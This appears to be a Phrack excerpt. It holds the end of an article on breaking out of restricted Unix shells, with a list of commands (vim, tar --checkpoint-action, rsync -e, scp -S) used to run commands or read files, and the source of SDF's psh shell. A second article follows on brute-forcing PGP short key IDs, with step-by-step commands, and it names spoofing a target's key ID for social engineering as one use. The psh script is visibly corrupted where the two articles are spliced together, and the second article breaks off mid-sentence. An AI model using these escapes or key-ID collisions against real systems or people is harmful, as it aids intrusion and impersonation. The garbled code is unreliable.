3) http://www.defensecode.com/public/
   DefenseCode_Unix_WildCards_Gone_Wild.txt

--[ Appendix A - Common commands with useful primitives

- vim :: Execution primitive
    :set shell=/bin/bash 
    :shell
- arp -f <file> :: File read primitive
- iptables --modprobe=<cmd> :: Execution primitive
- tar --checkpoint-action=<cmd> :: Execution primitive
- rsync -e <cmd> :: Execution primitive
- scp -F <file> a b: :: File read primitive
- scp -S <command> a b: :: Execution primitive
- lynx 'e' :: File read/write in editor
- lynx ! :: Execute Primitive
- mail "~v" :: Execute primitive

--[ Appendix B - psh Source code 

#!/usr/pkg/bin/pdksh
stty susp '' intr '' quit '' erase '^h'
count=0
ccount=0
export TERM=xterm-color
export SHELL=/dev/null
export LESSSECURE=true
export HISTORY=$HOME/.history
export EDITOR=/usr/pkg/bin/pico
export VISUAL=/usr/pkg/bin/pico
export NNTPSERVER=VALIDATE.TO.ACCESS.USENET
export MYTTY=`tty|cut -d/ -f3,4`
export SMALLTTY=`echo $MYTTY|cut -c4-5`
export MYIP=`echo $SSH_CLIENT|awk '{print $1}'`

if [ -f ${HOME}/.profile ]
then rm -f ${HOME}/.profile
exit 0
fi
if [ -f ${HOME}/.kshrc ]
then rm -f ${HOME}/.kshrc
exit 0
fi

if [ "$MYIP" = "" ]
then MYIP="x.x.x.x"
fi
if [ -f $HOME/.pshrc ]
then BACKSPACE=`grep BACKSPACE $HOME/.pshrc|cut -d= -f2`
if [ "$BACKSPACE" != "" ]
then stty erase $BACKSPACE 1>/dev/null 2>/dev/null
fi
fi

Validate(){
echo
echo "Validation is basically designed to protect us from spammers. There"
echo "are ways you can get validated by an SDF member. For instance if you"
echo "were a student and your professor taught a class here on SDF you"
echo "could gain validation through that class."
echo
echo "If you were referred to SDF by a friend or a current SDF member,"
echo "they may be able to validate your new account for you. You can"
echo "usually find SDF egulars in either 'com' or 'irc'. Be sure to ask"
echo "them to help you."
echo
echo "(continue)\c"
read continue
echo
echo "Validating your account ensures our future! Please do it today."
echo "Remember, you make SDF what it is. Without you, we wouldn't exist."
echo
echo " 1) Get a stamped envelope, a sheet of paper and ONE (1) US Dollar."
echo " 2) Write '$LOGNAME' clearly in the upper left hand corner of the"
echo "envelope."
echo " 3) Fold the donation inside a piece of paper and place inside the"
echo "envelope."
echo " OPTIONAL: Send TWO (2) US Dollars & SASE for an SDF Bumper Sticker."
echo
echo " 4) Seal and mail to: SDF Public Access UNIX System"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo
echo "Alternatively you may 'validate' your account via PAYPAL by clicking"
echo "on the"
echo "'DONATE' button at the bottom of the http://sdf.org website. The"
echo "paypal"
echo "minimum is \$3. Please include 'Validate $LOGNAME' in the Payment"
echo "For field."
echo
#echo "We also accept BitCoin for validation:"
echo "17GQEeNNHYPmkdgzHmHXiyMaVfgrhPvGBQ"
echo "We also accept BitCoin - Please type 'bitcoin' for details."
echo
echo "You may also credit the validation fee towards 'arpa' membership"
echo "should"
echo "you decide to join 'arpa' within 30 days of validating your account."
echo
echo "(continue)\c"
read continue
echo
echo "To see what you get as a validated member, type 'user'"
echo "For Lifetime ARPA membership to SDF via paypal, type 'arpa'"
echo "To see a list of UNIX commands you can use *NOW*, type 'unix'"
echo "To view user contributed tutorials, visit http://sdf.org/?tutorials"
echo "US Military Personnel, please type 'mil'"
echo
}

Menu(){

echo "SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*"
echo
echo " what - what can I use this account for?"
echo " unix - a listing of UNIX commands available to you NOW"
echo " how - information on increasing membership"
echo " teach - using SDF in a classroom setting"
echo " dialup - information about SDF dialup service"
echo " arpa - about lifetime arpa membership"
echo " bboard - sdf user message boards"
echo " commode - chat with other users online"
echo " ysm - chat on the ICQ network"
echo " bsflite - chat on the AIM network"
echo " msnre - chat on the MSN network"
echo " ttytter - listen to Twitter tweets anonymously"
echo " lynx - browse the WWW textually or access GOPHER"
echo " bksp - set your BACKSPACE key"
echo " faq - frequently asked questions"
echo " software - display software programs installed on the system"
echo " quote - get a real time stock quote"
echo " games - a listing of available games"
echo " thxmoo - connect to the THXMOO"
echo " mud - connect to the SDFmud"
#echo " delme - delete your free account"
echo " validate - gain additional shell access (also try 'user' for"
echo "details)"
echo

}

Move(){
echo "Basic movement in $1:"
echo
echo "j - down (or rotate)"
echo "k - up (or rotate)"
echo "h - left"
echo "l - right"
echo "q or Q to quit"
echo
echo "[RETURN]\c"
read ret
}

case `uname -n` in
ol) /usr/local/bin/maint
kill -9 0 ;;
mx) echo
echo "mx is reserved for mail service only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
sverige) echo
echo "sverige is reserved for MetaARPA members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
vinland) echo
echo "vinland is reserved for VHOST members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
esac

/usr/pkg/bin/expire
#echo "Would you like to VALIDATE your account now? (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 121|89) echo "YES"
# Validate ; echo "[RETURN]\c";read return;;
# *) echo "NO" ;;
#esac
echo
echo "Please press your BACKSPACE key: \c"
stty raw
dd of=.$$ count=1 1>/dev/null 2>/dev/null
stty -raw
stty erase `head -1 .$$` 2>/dev/null
rm -f .$$
#echo
#echo "Enable Colours: (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 89|121) COLOR=TRUE
# touch -f $HOME/.color ;;
# *) COLOR=FALSE ;;
#esac
clear
echo
echo "===================================================================="
echo "SDF host uptime report for Seattle WA, Dallas TX (USA) and Germany"
echo " Please use 'tty.sdf.org' for general access"
echo "===================================================================="
echo
/usr/local/bin/ruptime -a
echo "(continue)\c"
read return
/usr/pkg/games/pom
/usr/pkg/bin/phoon
echo "(continue)\c"
read return
/usr/pkg/bin/guestbook -l 50
echo "\nType 'help' for Commands."
echo "Type 'com' to chat with other users."
echo "Type 'ttytter' to listen to Twitter Tweets anonymously."
echo "Type 'mud' to play the SDFmud."
case `url $LOGNAME` in
*.*.*) echo "\nYour website is http://`url ${LOGNAME}|awk '{print $1}'`"
echo "with files in $HOME/html\n" ;;
*) echo "Type 'mkhomepg' to set up your personal website.\n"
esac
case `echo $RANDOM|cut -c1` in
1|2|3|4|5) echo "Did you know you can become a permanent LIFETIME member"
echo "of SDF"
echo "by making a onetime donation of \$36? Type 'arpa' for more info!\n" \
;;
6|7|8|9) echo "Did you know you can validate your account and gain weekend"
echo "IRC access"
echo "by making a donation of \$1 to \$3? Type 'validate' for more"
echo "info!\n" ;;
esac
/usr/pkg/bin/dues -p
#Menu
PROMPT="`uname -n`"
while true
do
if [ ! -d $HOME ]
then echo "You may have become an ARPA member."
echo
echo "The update is now taking place and may require 2 or 3 minutes to"
echo "complete. You will now be logged out. When you reconnect, please"
echo "use ssh to connect to 'tty.sdf.org' for load balancing."
echo
echo "[RETURN]\c"
read return
kill -9 0
fi

if [ -f $HOME/.mailcap ]
then rm -f $HOME/.mailcap
fi
if [ "$COLOR" = "TRUE" ]
OMPT

thene echo "$PROMPT:`pwd`> \c"
fi
read command
arg=`echo ${command}|awk '{print $2,$3,$4,$5,$6}'`

#if [ "$ccount" -gt "6" ]
#then echo "\nPlease 'validate' or join 'arpa' today."
# echo "Your membership ensures our future!!\n"
# ccount=0
#else ccount=`expr $ccount + 1`
#fi
echo "[`date +"%d-%b-%y %H:%M:%S"` $MYIP $MYTTY $PROMPT] $PWD $command" \
2>/dev/null >>$HISTORY
case `echo $command|awk '{print $1}'|tr A-Z a-z` in
tty) tty;;
stty) stty;;
lock) lock;;
ulimit) ulimit;;
uname*) uname `echo ${command}|awk '{print $2}'` ;;
echo*) shift ${command}
echo "${command}" ;;
how) /usr/local/bin/how;;
cal*) /usr/pkg/bin/cal `echo $command|awk '{print $2}'` ;;
what) /usr/local/bin/newbie
;;

passwd*|chfn*|chsh*|maint) /usr/local/bin/passwd ;;
url*) url=`echo $command|awk '{print $2}'`
url $url;;
gopher*) site=`echo $command|awk '{print $2}'`
if [ "$site" = "" ]
then lynx -anonymous -restrictions=all gopher://sdf.lonestar.org
else lynx -anonymous -restrictions=all $site
fi
;;
bksp*) bksp=`echo $command|awk '{print $2}'`
if [ "$bksp" = "" ]
then echo "\nTo set your backspace key, type 'bksp' then press your"
echo "actual key and then press return.\n"
else stty erase $bksp
echo "BACKSPACE=$bksp" > $HOME/.pshrc
fi;;

bitcoin*) /usr/local/bin/bitcoin ;;
sftp*|ftp*) echo "\nPlease 'validate' your account to FTP files to and"
echo "from your SDF account.\n" ;;
tar*|make|cc*|tf*|gcc*|g++*|perl*|python*|ruby*|*configure*|netstat*| \
telnet*|ssh*|rlogin*|screen*|nmap*|wget*)
echo "\nTo use this feature, please join the SDF 'arpa' membership"
echo "ARPA membership is available to you for a one time donation of only"
echo "\$36."
echo
echo "Your membership ensures our future! Type 'arpa' for details.\n"
;;
getdialup*) npa=`echo $command|awk '{print $2}'`
/usr/local/bin/getdialup $npa ;;
setdialup) echo "Please validate your account first. For now you can use"
echo "'getdialup' to find access numbers in your area." ;;
phlog|deskshots|sdfers) echo "Please validate your account first." ;;
dialup) /usr/local/bin/dialup ;;
games) /usr/local/bin/games ;;
mud) /usr/pkg/bin/mud ;;
war) /sys/sdf/bin/war ;;
warsetup) /sys/sdf/bin/warsetup ;;
thxmoo) /usr/pkg/bin/thxmoo ;;
bj) /usr/pkg/games/bj;;
lander) /usr/pkg/games/lander;;
othello) /usr/pkg/games/othello;;
advent) /usr/pkg/games/advent;;
zork) /usr/pkg/games/advent;;
tttt) /usr/pkg/games/tttt;;
moon) /usr/pkg/bin/moon-buggy;;
tetrinet) if [ "$LINES" -lt "50" ]
then echo "% tetrinet requires your TTY to be at least 50 lines."
sleep 2
fi
tetrinet $LOGNAME tetrinet.sdf.org
;;
tess) /usr/pkg/games/tess;;
c4) /usr/pkg/games/c4;;
ski) /usr/pkg/games/ski;;
knight) /usr/pkg/games/knight;;
suicide) /usr/pkg/games/suicide;;
dinkum) /usr/pkg/games/dinkum;;
aybabtu) /usr/local/bin/aybabtu;;
barnacle) /usr/pkg/bin/barnacle;;
invaders) /usr/pkg/games/invaders
stty sane ;;
life) /usr/pkg/bin/life /usr/pkg/share/life/tiny.life ;;
order) echo "Please validate your account first.";;
ysm) /usr/pkg/bin/ysm;;
micq) /usr/pkg/bin/rmicq;;
bsflite) /usr/pkg/bin/bsflite;;
msnre) /usr/pkg/bin/msnre;;
dopewars) dopewars;;
zombies) Move $command
/usr/pkg/bin/zombies;;
snake) Move $command
/usr/pkg/games/snake;;
wanderer) Move $command
/usr/pkg/games/wand;;
worm) Move $command
/usr/pkg/games/worm;;
greed) Move $command
/usr/pkg/games/greed;;
tetris) Move $command
/usr/pkg/games/tetris;;
sokoban) Move $command
/usr/pkg/games/sokoban;;
robots) Move $command
/usr/pkg/games/robots;;
torus) Move $command
/usr/pkg/games/torus;;
mazewar) /usr/local/bin/mazewar;;
mdg) /usr/local/bin/mdg
if [ "$?" != "0" ]
then echo "\nMDG might not be running at the moment"
echo "Please try again later."
fi;;
dict*) args=`echo $command|awk '{print $2}'`
dict $args
;;
quote*) args=`echo $command|awk '{print $2}'`
quote $args
;;
cal*) args=`echo $command|awk '{print $2}'`
cal $args
;;
domains) /usr/local/bin/domains ;;
unix) unix ;;
linux) linux;;
dig*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" "$8}'`
dig $domain
;;
host*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" \
"$8}'`
host $domain
;;
geoip*) domain=`echo $command|awk '{print $2}'`
geoip $domain
;;
whois*) domain=`echo $command|awk '{print $2}'`
jwhois $domain
;;
nslookup*) domain=`echo $command|awk '{print $2}'`
nslookup $domain
;;
pkg_info) pkg_info 2>/dev/null|sort|more ;;
lynx*restrict*) echo $command|mailx -s "$LOGNAME" smj;;
lynx*) url=`echo $command|awk '{print $2}'`
if [ "$url" = "" ]
then lynx -anonymous -restrictions=all http://sdf.lonestar.org
else case $url in
http:*) ;;
*) url="http://$url" ;;
esac
lynx -anonymous -restrictions=all $url
fi
;;

edit*|vi*|pico*|emacs*) file=`echo $command|awk '{print $2}'`
if [ "$file" = "" ]
then echo "usage: edit {file}"
else case $file in
*../*|*.kshrc*|*.bashrc*|*.pshrc*|*.muttrc*|*.telnet*|*.mailcap*|*. \
forward*|*.plan*|*.cfg*|*.history*) echo "usage: edit {file}";;
*) /usr/pkg/bin/pico -t -b -o $HOME $PWD/$file ;;
esac
fi
;;
man*) man `echo $command|awk '{print $2}'`;;
rm*) target=`echo $command|awk '{print $2}'`
if [ "`echo $command|awk '{print $3}'`" != "" ] || [ "$target" = "" ]
then echo "usage: rm {filename}"
else case $target in
*.history*|*psh*|*.hushlogin*) echo "Can't remove $target";;
*) if [ -d $target ]
then rm -rf $target
else rm $target
fi;;
esac
fi;;
mv*) oldname=`echo $command|awk '{print $2}'`
newname=`echo $command|awk '{print $3}'`
if [ "`echo $command|awk '{print $4}'`" != "" ] || [ "$oldname" = "" ] || \
 [ "$newname" = "" ]
then echo "usage: mv {oldfile} {newfile}"
else case $oldname$newname in
*.muttc*|*.kshrc*|*.mailcap*|*.telnet*|*.plan*|*html*|*.forward*|*. \
history*|*psh*|*.hushlogin*|*.cfg*) echo "Cant move $oldname to $newname";;
*) mv $oldname $newname ;;
esac
fi;;
ping*) /sbin/ping -c5 `echo $command|awk '{print $2}'`;;
teach) cat ~ftp/pub/sdf/faq/TEACH/01;;
traceroute*) traceroute `echo $command|awk '{print $2}'` & ;;
games) games;;
disk) disk;;
df*) df `echo $command|awk '{print $2}'` ;;
oneliner) /usr/pkg/bin/oneliner;;
rogue) /usr/pkg/games/rogue ;;
hack) /usr/pkg/games/hack ;;
nethack) /usr/pkg/bin/nethack ;;
hunt*) echo
echo "hunt commands:"
echo
echo "j - down"
echo "k - up"
echo "h - right"
echo "l - right"
echo "1 - gun"
echo "2 - grenade"
echo "3 - bomb"
echo "q - quit"
echo
echo "the shift key plus j,k,h or l changes direction"
echo
/usr/pkg/games/hunt `echo $command|awk '{print $2}'`;;
upload) echo "press CTRL-X several times to abort."
lrz -y;;
mkdir) directory=`echo $command|awk '{print $2}'`
case $directory in
*html*|*.plan*) echo "usage: mkdir {name}";;
*) mkdir $directory;;
esac;;
#mkhomepg*|mkhome*) mkhomepg `echo $command|awk '{print $2}'`;;
mkhomepg*|mkhome*) echo "mkhomepg has been temporarily disabled for"
echo "prevalidated users." ;;

vhost) echo
echo " As a lifetime ARPA member, you can increase your membership level"
echo " so that you may virtually host your own domain name on SDF. This"
echo " includes DNS, mail service and virtual webhosting. For more info"
echo " check out the FAQ: file"
echo ;;
help) Menu;;
profiles) /usr/pkg/bin/profiles ;;
#freeirc) echo "% 'freeirc' is available to ALL validated users from"
echo "Friday 23:59:59"
# echo " through Monday 00:00:01 UTC. Please 'validate' your account"
# echo "today!" ;;
user) echo "\nValidated users (\$1.00 or more) have immediate access to:\n"
echo " 200mb total (home, web, mail & gopher)"
echo " incoming file transfers via ftp or sftp"
echo " elm, pine, mutt, mailx, rmail, pop3, gopher"
echo " bash, ash, ksh, tcsh, rc, zsh, tclsh"
echo " your URL http://$LOGNAME.freeshell.org"
echo " limited cgi execution (shell scripts)"
echo " icq, aim, talk, commode, bboard"
echo " dialup ppp/shell access in the US and Canada"
echo " USENET and ClariNET read/post access"
echo " freeirc on Saturdays and Sundays"
echo " hundreds of UNIX utilities"
echo
echo "The purpose of the prevalidated account is to help newusers"
echo "learn about the UNIX system. Type 'unix' to see what UNIX"
echo "commands are available to you right now. You can validate"
echo "your account today! type 'validate' to validate\n";;
env) env;;
set) set;;
#delme) delme;;
bboard) /usr/pkg/bin/bboard;;
eggdrop*) echo "% eggdrop is available to MetaARPA members only" ;;
psybnc*) echo "% psybnc is available to MetaARPA members only" ;;
arpa|join|member) arpa;;
auction) auction;;
cat*|more*|less*) file=`echo $command|awk '{print $2}'`
case $file in
*psh*) file="" ;;
*random*|*null*|*zero*) echo "% Ja tvoi sluga ja tvoi rabotnik";file="" ;;
esac
if [ "$file" = "" ]
then echo "usage: cat {filename}"
else if [ "`wc -l $file|awk '{print $1}'`" -ge "500" ]
then tail -500 $file
else cat $file
fi
fi;;
software*) /usr/local/bin/software `echo $command|awk '{print $2}'` ;;
cd*) cd `echo $command|awk '{print $2}'`;;
finger*) user=`echo $command|awk '{print $2}'`
case ${user} in
*-*) user=root ;;
esac
size=`ruptime -a|awk 'END {print $1}'`
if [ "$user" = "" ]
then echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)"
else finger -m $user
fi ;;
date) date ;;
whereis*) whereis `echo $command|awk '{print $2}'`;;
locate*) locate `echo $command|awk '{print $2}'` ;;
whoami*) /usr/bin/whoami ;;
who|w|ps*|last*)
size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;
uptime|ruptime*) ruptime -a;;
chmod*) chmod `echo $command|awk '{print $2" "$3}'` ;;
ls*|ll*|dir*) if [ "$COLOR" = "TRUE" ]
then /usr/pkg/bin/colorls -a `echo $command|awk '{print $2}'|tr R r`
else ls -a `echo $command|awk '{print $2}'|tr R r`
fi ;;
sl*) /usr/pkg/bin/sl ;;
pwd) pwd;;
msg) msg ;;
# ps*) ps `echo $command|awk '{print $2}'` ;;
validate) Validate ;;
mil) /usr/local/bin/mil ;;
why) echo
echo "It didn't used to be this way .. but you must understand that your"
echo "small token of trust builds a better SDF for all of us:"
echo
echo "Due to the increased number of security and spam attacks, we are now"
echo "asking that you send ONE US Dollar (or 5 EURO note) as a token of"
echo "your sincerity in becoming a longterm member of our community. It is"
echo "unfortunate that the net has become filled with people whose daily"
echo "goal in life is to terriorize others online. We believe that asking"
echo "for ONE US Dollar would not present a burden"
echo "to anyone in the world. We hope to keep SDF a safe and secure haven"
echo "for you and other shell users. To get an SDF bumper sticker, send in"
echo "TWO US Dollars and a SASE (Self-Addressed Stamped Envelope). Please"
echo "include your username."
echo
echo " SDF public access UNIX system"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo;;
w*) size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;

alpine*|pine*|mail*|mutt*|elm*) case `echo $command|awk '{print $2}'` in
-*) echo "unknown mail flag." ;;
*) mutt -F /sys/pkg/etc/rmuttrc ;;
esac;;
*irc*|bitchx*|irssi*|epic*|freeirc*)
#tetrinet $LOGNAME tetrinet.sdf.org ;;
echo "-=- Basic IRC Commands -=-"
echo
echo "/list - List channels"
echo "/join #channel - Join a channel"
echo "/list #channel - Leave a channel"
echo "/msg nick msg - Send a private message"
echo "/who - Who is on"
echo "/quit - Quit IRC"
echo
echo "-(continue)-\c"
read ret
/usr/pkg/bin/oirc -p 7000 ${LOGNAME} irc.sdf.org
#/usr/pkg/bin/oirc -p 6667 ${LOGNAME} irc.sdf.org
echo ;;

com|chat|commode) \
room=`/usr/pkg/bin/comwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/com ;;
pcom|pcommode) room=`/usr/pkg/bin/pcomwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/pcom ;;
ttytter*|twitter*) echo "% Twitter username (or [RETURN] for anonymous):\c"
read tweet
if [ "$tweet" = "" ]
then echo "% Logging in anonymously"
/usr/local/bin/ttytter -anonymous
else /usr/local/bin/ttytter -user=$tweet
fi ;;
w2k) /usr/local/bin/w2k ;;
mkgopher) mkgopher;;
faq) faq;;
clear) clear;;
usenet|trn*|tin*|slrn*|nn*|rn*) echo "% USENET is available to validated"
echo "users." ;;
die) echo "you has failed."
sleep 4
exit 0 ;;
logout|leave|bye|quit|exit|escape|terminate|cease|logoff|end)
clear
#echo "Would you like to remove your account from our system? (y/n) \c"
#read ans
# case $ans in
# y*|Y*) delme ;;
# *) echo "% '$LOGNAME' will not be deleted." ;;
# esac
echo "Good Bye from the S D F - 1 .."
echo
echo "Please 'validate' or join 'arpa' soon."
echo "Your support is appreciated!"
echo
echo "Thank you!"
sleep 8
exit 0;;
uinfo|expire) uinfo;expire ;;
dues) /usr/pkg/bin/dues ${arg} ;;
#helpdesk) /usr/pkg/bin/helpdesk ;;
guestbook) /usr/pkg/bin/guestbook ;;
id*) /usr/bin/id ${arg} ;;
nospam) echo "You must be validated to use this feature."
;;
*) if [ "$command" != "" ]
then echo "psh: $command: not found - try 'help' for commands"
else if [ "$count" -gt "20" ]
then exit 0
else count=`expr $count + 1`
fi
fi;;
esac
doneecho "


|=[ 0x04 ]=---=[ Personalized PGP Key IDs - f1los0tt1l3 ]=---------------=|


|=-----------------------------------------------------------------------=|
|=-----------=[ Personalized PGP Key IDs for fun and profit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ f1los0tt1l3 ]=---------------------------=|
|=-----------------------------------------------------------------------=|


---[ Contents

  1 - Introduction
   1.1 - Prior work
  2 - The spec
  3 - The attack
   3.1 - Preparation
   3.2 - The crash
    3.2.1 - Runtime stats
   3.3 - The patch
  4 - Conclusion
  5 - References
  6 - Code

---[ 1 - Introduction

Everybody should be allowed to have his (or someone's) own PGP key ID. Who
doesn't want his PGP key to match his favorite hex nickname or his
target's key for some cheap social engineering? I certainly want, so I
started researching how they are derived and if they could be bruteforced.

Note: when we speak about key IDs here we mean the 4-byte short ones that
everybody love to use. However, given enough processing power (or maybe a
SHA1 ASIC|preimage attack) the process can obviously scale to any key ID
length.

-----[ 1.1 - Prior work

GIYF, right? Well, a couple people tried this and lived to tell the tale
(or, well, decided to make it public) but none of them permitted me to get
a 4096 bit RSA key as I wanted it.

In May 2010, halfdog posted on full-disclosure [1] some Java code that
worked on DSA keys. Not exactly fast or customizable, but hey, it was 3
years ago.

Then, in Dec 2011, Asheesh, a Debian dev particularly fond of his key ID,
found a way to create a new RSA 4096 key with that ID (and a bug in GnuPG
handling of duplicate keys) [2]. He highlighted the disruptive potential
of that and decided not to release the code. Bummer.

But the keyservers carry even older evidence (even if one shouldn't trust
the key creation field, especially on these keys): the first example of
custom IDs I could find is

    pub  1024R/A69AB99CDEADBEEF 1995-09-28

that actually employs a old packet type.

So we are not doing anything truly new, but there's still not a public
method to get an arbitrary key with an arbitrary key ID.

---[ 2 - The spec

So, let's get our hands dirty: grab the OpenPGP spec, RFC 4880 [3], and
look up how are those key IDs derived [RFC 4880 - 12.2].

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   For a V3 key, the eight-octet Key ID consists of the low 64 bits of
   the public modulus of the RSA key.

---------------------------------------------------------------------------

Woah, that easy? No, it's not. Version 3 keys are deprecated [RFC 4880 -
5.5.2], for a bad reason - key IDs collisions, ahem - and a good reason -
MD5. So, as we don't want to build our new shiny RSA 4098 on MD5, let's
move on to V4 keys.

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   A V4 fingerprint is the 160-bit SHA-1 hash of the octet 0x99,
   followed by the two-octet packet length, followed by the entire
   Public-Key packet starting with the version field.  The Key ID is the
   low-order 64 bits of the fingerprint.

---------------------------------------------------------------------------

Great, so what's in a Public-Key packet?

-------------[ RFC 4880 - 5.5.2.  Public-Key Packet Formats ]--------------

   A version 4 packet contains:

     - A one-octet version number (4).

     - A four-octet number denoting the time that the key was created.

     - A one-octet number denoting the public-key algorithm of this key.

     - A series of multiprecision integers comprising the key material.

---------------------------------------------------------------------------

Note: numbers are big-endian [RFC 4880 - 3.1]

So the variable parts are the creation timestamp and the key material. The
key material is a bunch of algorithm-specific MPI [RFC 4880 - 3.2] which
can't be tampered with without changing their value.

One might also try to add garbage to the packet, but implementations strip
it. Bummer.

---[ 3 - The attack

Great, we know what constitutes the key ID, and we know that we can tamper
with the key creation value and/or with the RSA/DSA/Elgamal parameters. I
decided to only loop through the key creation field for a simple reason: I
don't trust a crappy tool written by me with RSA primes selection, in
particular in a scenario like this where a lot of different primes are
needed, as skews can lead to disastrous consequences [4].

After all entropy usage couldn't be optimized much and at least this way
we have the peace of mind of GnuPG generated keys.

So we will simply build a bruteforce on the key creation timestamp value.

-----[ 3.1 - Preparation

Ok, let's dive in. First of all fence your GnuPG env, to avoid cluttering
or damaging your own.

    $ mkdir -m 700 GNUPGHOME && export GNUPGHOME=`pwd`/GNUPGHOME

Now we need to generate a pool of enough keys to have a fair chance of
finding a match, but how many? Well, obviously it depends on the number of
seconds in the time frame we consider acceptable for the key creation time.

Let's dive into some math. Since SHA1 is unbiased each try is independent
and for each try we have a fixed probability of finding a match: one into
the number of different possible suffixes = 1 / 2^32.

So, the only thing that matters is how many tries we can do. This number
is s (seconds in the time frame) * x (number of keys in the pool).

The probability of finding a match in k tries is 1 less the probability of
failing all of them [5] and this last is (prob of failing one) ^ k =
((2^32 - 1) / 2^32) ^ k.

Here are the final formula and a handy table:

            2^32 - 1   s * x          s = seconds in the time frame
  y = 1 - ( -------- )                x = number of keys in the pool
              2^32                    y = probability of a success

  +--------------+------+------+------+------+------+
  | frame \ prob | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +--------------+------+------+------+------+------+
  |         past |    3 |    5 |    8 |   10 |   15 |
  +--------------+------+------+------+------+------+
  |           5y |   19 |   38 |   63 |   82 |  126 |
  +--------------+------+------+------+------+------+
  |           1y |   95 |  189 |  314 |  408 |  628 |
  +--------------+------+------+------+------+------+

For a fancy 3D graph you can plot the probability on a (years in the time
frame X keys in the keypool) space [6]:

  y = 1 - ((2 ^ 32 - 1) / 2 ^ 32) ^ (60 * 60 * 24 * 365 * a * x)

GnuPG has a convenient function to generate keys in batch mode:

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --trustdb-name ./trustpool.gpg \
    --gen-key --batch batchfile.txt

    # batchfile.txt
    Key-Type: RSA
    Key-Length: 4096
    Name-Real: Filippo Valsorda
    Name-Comment: f1los0tt1l3
    Name-Email: f1los0tt1l3@phrack.com
    Expire-Date: 0

Note: it does not matter what you set in the Name-* fields, as we are
going to discard the uid to create a validly signed one later.

Set it to run the number of times you want, maybe plug in haveged [7], a
Geiger or a radio producing white noise and... uh, go grab a coffee.

-----[ 3.2 - The crash

Well, now we have our keypool and we need to bruteforce the key ID out of
it. I wrote a Python 3 + Cython parallelizable implementation, crash.py.

Compile the Cython module with (you'll need Cython and OpenMP):

    $ python3 setup.py build_ext --inplace

Note: clang and old gcc versions panicked, I used gcc 4.7.

Then start the bruteforce with

    $ python3 crash.py pubpool.gpg NEWKEYID [0xTIMESTAMP]

where 0xTIMESTAMP is the lowest limit to the creation time, if any.

Want to know something cool? The only thing needed to do the bruteforce is
the pubpool, so you can export it out of your crappy airgapped system and
perform the number crushing on some powerful untrusted machine.

You will hopefully get a result like this

  Current fingerprint: 9b179a2af2f8a744b2214de4eec578f57e61d52a
  Current timestamp: 0x512187c9
  NEW fingerprint: d8efd70f8479432e9158ac27eb56af7c42424242
  RESULT timestamp: 0x1b550652

------[ 3.2.1 - Runtime stats

The bulk of the heavy-lifting involved in this bruteforce is making the
SHA1 hashes, and one of them is done for each timestamp tried. The number
of tries is clearly independent of the width of the time frame, and grows
with the probability of finding a match. The two - probability and tries -
are bound by a simplified version of the formula above.

            2^32 - 1   x
  y = 1 - ( -------- )                x = tries / SHA1 hashes
              2^32                    y = probability of a success

So what matters here is what SHA1 hashrate we manage to get. The crash.py
Cython implementation is quite fast, and achieves 3.0 * 10^6 h/s on a
quad-core 2.3 GHz i7 or 8.3 * 10^6 h/s on a AWS EC2 cc2.8xlarge instance.

Note: this means that a matching key would cost you $0.50 of Spot Instance
as of April 2013.

However, much better can be done: the oclHashcat-plus guys claim a 3.081 *
10^9 SHA1/s on a AMD hd6990 GPU [8]. With an hashrate like that, a match
can be found in a matter of seconds. Writing a high-performance CUDA or
OpenGL implementation is left as an exercise to the reader ;)

Here is a reference table of running times:

  +----------------+------+------+------+------+------+
  |    probability | 0.50 | 0.75 | 0.90 | 0.95 | 0.99 |
  +----------------+------+------+------+------+------+
  |   tries / 10^9 |  2.9 |  5.9 |  9.8 | 12.8 | 19.7 |
  +----------------+------+------+------+------+------+
  |  runtime on i7 |  17m |  33m |  55m |  71m | 110m |
  +----------------+------+------+------+------+------+
  | runtime on EC2 |   6m |  12m |  20m |  26m |  40m |
  +----------------+------+------+------+------+------+
  | runtime on GPU |   1s |   2s |   3s |   4s |   6s |
  +----------------+------+------+------+------+------+

-----[ 3.3 - The patch

Now we have to patch the key. patch.py, incredibly, does exactly so.

First, export the secret key for which you had the match

    $ gpg --no-default-keyring --secret-keyring ./secpool.gpg \
    --keyring ./pubpool.gpg --export-secret-keys OLDKEYID > privkey.gpg

Then run patch.py on it, passing it the "RESULT timestamp" from crash.py:

    $ python3 patch.py privkey.gpg TIMESTAMP > resultkey.gpg

Finally, force gpg to import the key even if the (invalid) bounding
signature has been stripped:

    $ gpg --allow-non-selfsigned-uid --import resultkey.gpg

And restore the bounding signature by creating a new uid:

    $ gpg --edit-key NEWKEYID

    gpg> adduid
    gpg> uid 1
    gpg> deluid
    gpg> trust
    gpg> check
    gpg> save

Note: don't create the new uid as an exact copy of the old, otherwise
deluid will delete both of them from the secret key - it's a GnuPG bug.

Done! You now have your new shiny PGP key with a personal key ID. Export
it to your main GnuPG env or whatever.

---[ 4 - Conclusion

Have fun, there are still many interesting uncatched key IDs out there:
0x11111111, 0xabaddeed, 0xaaaaaaaa, 0xg00d1dea, 0x27182818, 0x14142135...
Please just leave 0x31415926, 0x42424242 and 0x13371337 for me ;) and
